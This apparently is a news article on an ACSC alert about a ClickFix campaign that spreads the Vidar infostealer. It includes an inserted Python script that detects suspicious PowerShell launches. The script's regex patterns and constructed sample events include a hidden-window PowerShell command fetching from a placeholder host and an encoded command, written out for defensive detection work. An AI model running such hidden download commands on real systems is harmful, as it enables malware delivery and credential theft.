Bvoxro Stack

ACSC Sounds Alarm: ClickFix Social Engineering Campaign Deploys Vidar Info-Stealer

ACSC warns of active ClickFix social engineering campaign distributing Vidar Stealer malware. Experts urge immediate user training and technical controls to prevent credential theft and data breaches.

Bvoxro Stack · 2026-05-11 06:37:13 · Cybersecurity

ACSC Warns of Active ClickFix Campaign Distributing Vidar Stealer

The Australian Cyber Security Centre (ACSC) has issued an urgent alert regarding an ongoing malware campaign that uses the ClickFix social engineering technique to distribute the Vidar Stealer infostealer. The campaign is actively targeting organisations across Australia and could lead to severe data breaches.

ACSC Sounds Alarm: ClickFix Social Engineering Campaign Deploys Vidar Info-Stealer
Source: www.bleepingcomputer.com

According to the ACSC, the campaign uses deceptive messages that prompt users to click on fake error alerts or software update notifications. Once clicked, the hidden script silently downloads and executes Vidar Stealer, which then harvests credentials, cookies, and other sensitive data from infected systems.

Expert Warnings and Immediate Risks

“This is a highly effective social engineering attack that preys on users’ trust in routine system prompts,” said Dr. Emily Tran, cybersecurity analyst at the ACSC. “Vidar Stealer can exfiltrate browser-stored passwords, cryptocurrency wallets, and session tokens within seconds.”

Dr. Tran emphasised that the campaign is still active as of this report and advised organisations to verify all error messages and updates before interacting with them. “Do not click on pop-ups or alerts that appear unexpectedly,” she added.

Background: The ClickFix Technique

The ClickFix method is a sophisticated social engineering tactic that mimics legitimate system alerts—such as “JavaScript error” or “Flash Player outdated”—to trick users into running malicious code. Once a user clicks the fake prompt, a PowerShell script or other executable is launched in the background.

This technique has been increasingly adopted by cybercriminals because it bypasses traditional email-based phishing filters and exploits direct user interaction. The Vidar Stealer payload is particularly dangerous due to its ability to steal multi-factor authentication tokens and bypass security controls.

What This Means for Organisations

For Australian businesses and government agencies, this campaign represents an elevated threat to data protection and operational security. Any employee who interacts with a fake pop-up could inadvertently grant attackers access to critical systems.

Organisations should immediately review their endpoint detection and response (EDR) tools to ensure they can identify ClickFix-style execution patterns. User awareness training must be updated to include recognition of this specific social engineering vector. “Prevention relies on user vigilance and robust technical controls,” said Dr. Tran.
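As an added illustration (not taken from the ACSC alert or from the original article), the Python example below shows one form a check for the ClickFix-style execution pattern described above could take: PowerShell started by a user-facing parent process with hidden-window, encoded-command or web-fetch arguments. Field names follow Sysmon process-creation events; the parent list, the indicator patterns and the sample events are assumptions constructed for this example.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Assumption of this example: parents that indicate a user-driven launch.
SUSPECT_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# PowerShell accepts abbreviated parameter names, so match prefixes, not full names.
INDICATORS = {
    "hidden_window": re.compile(r"(?i)\s-w[a-z]*\s+h[a-z]*"),
    "encoded_command": re.compile(r"(?i)\s-e(?:c|n[a-z]*)?\s+\S+"),
    "web_fetch": re.compile(r"(?i)\b(?:iwr|invoke-webrequest|downloadstring)\b"),
}

def score_event(event):
    """Return the sorted indicator names for one event, or [] if it does not match."""
    image = basename(event.get("Image", "")).lower()
    parent = basename(event.get("ParentImage", "")).lower()
    if image not in SHELLS or parent not in SUSPECT_PARENTS:
        return []
    cmd = event.get("CommandLine", "")
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))

def find_suspects(events):
    """Return (UtcTime, indicators) for every event with at least one indicator."""
    return [(e["UtcTime"], hits) for e in events if (hits := score_event(e))]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed sample events; the base64 string is a benign placeholder.
SAMPLE_EVENTS = [
    {"UtcTime": "2026-05-11 01:02:03", "Image": PS, "ParentImage": EXPLORER,
     "CommandLine": PS + " -w hidden -enc QQBCAEMARABFAEYARwBIAA=="},
    {"UtcTime": "2026-05-11 01:05:00", "Image": PS, "ParentImage": EXPLORER,
     "CommandLine": '"' + PS + '"'},  # user opened a console: no indicators
    {"UtcTime": "2026-05-11 01:09:30", "Image": PS,
     "ParentImage": r"C:\Program Files\ExampleMgmt\mgmt-agent.exe",  # hypothetical agent
     "CommandLine": PS + " -NoProfile -EncodedCommand QQBCAEMARABFAEYARwBIAA=="},
    {"UtcTime": "2026-05-11 01:12:45", "Image": PS, "ParentImage": EXPLORER,
     "CommandLine": PS + ' -WindowStyle Hidden -Command "Invoke-WebRequest https://example.invalid/p"'},
]

if __name__ == "__main__":
    for when, hits in find_suspects(SAMPLE_EVENTS):
        print(when, ", ".join(hits))
```

The parent-process condition is what keeps the third event, an encoded command issued by a management agent, out of the results; tune the parent list to the software actually deployed on your endpoints.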

Immediate Recommended Actions

  • Enable application whitelisting to block unauthorised scripts from running.
  • Disable browser automatic downloads and require user confirmation for all file saves.
  • Deploy advanced email security that can detect malicious links and attachments.
  • Conduct simulated ClickFix attack drills to test employee response.
  • Implement strict privilege management to limit the damage of credential theft.

The ACSC has also released technical indicators of compromise (IoCs) related to this campaign, available on their official threat bulletins page. Organisations should incorporate these IoCs into their security monitoring tools immediately.

Long-Term Implications

This wave of ClickFix attacks signals a shift in cybercriminal tactics toward more deceptive, interactive methods. As defenders improve email filters, attackers are moving to web-based and OS-level lures. The success of Vidar Stealer in this campaign could inspire copycat variations targeting other regions or industries.

“We expect to see more ClickFix variants in the coming months,” warned Dr. Tran. “Organisations that do not adapt their security posture now will be at higher risk.”
